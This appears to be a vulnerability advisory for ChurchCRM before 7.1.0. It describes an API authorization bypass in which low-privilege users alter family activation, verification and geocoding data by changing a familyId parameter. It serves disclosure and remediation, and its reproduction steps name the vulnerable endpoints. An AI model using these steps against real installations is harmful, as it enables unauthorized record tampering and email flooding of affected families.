ChurchCRM API Authorization Bypass Vulnerability Allows Unauthorized Family Record Modifications

A vulnerability in ChurchCRM prior to version 7.1.0 allows authenticated API users to modify family records without proper authorization. By changing the {familyId} parameter in requests, users can bypass role-based access control and manipulate family states on several critical endpoints. This includes deactivating or reactivating families, spamming verification emails, and triggering geocoding operations. The issue arises because these endpoints lack the necessary permission checks, enabling unauthorized modifications even for users without the required EditRecords privilege.

Impact

Exploitation of this vulnerability allows for unauthorized changes to family records, including verification statuses, activation or deactivation states, and geolocation data. Additionally, it can be used to disrupt services by flooding family members with verification emails.

Reproduction

To reproduce this vulnerability, log in as an authenticated user without the EditRecords privilege. Identify a family ID from the family listing. Then, use the API to send a request to one of the vulnerable endpoints, such as '/family/{familyId}/activate/{status}', '/family/{familyId}/verify', or '/family/{familyId}/geocode', including the family ID in the request. The API will process the request successfully, despite the lack of proper authorization.

Remediation

Users should update to ChurchCRM version 7.1.0 or later, where this vulnerability has been fixed.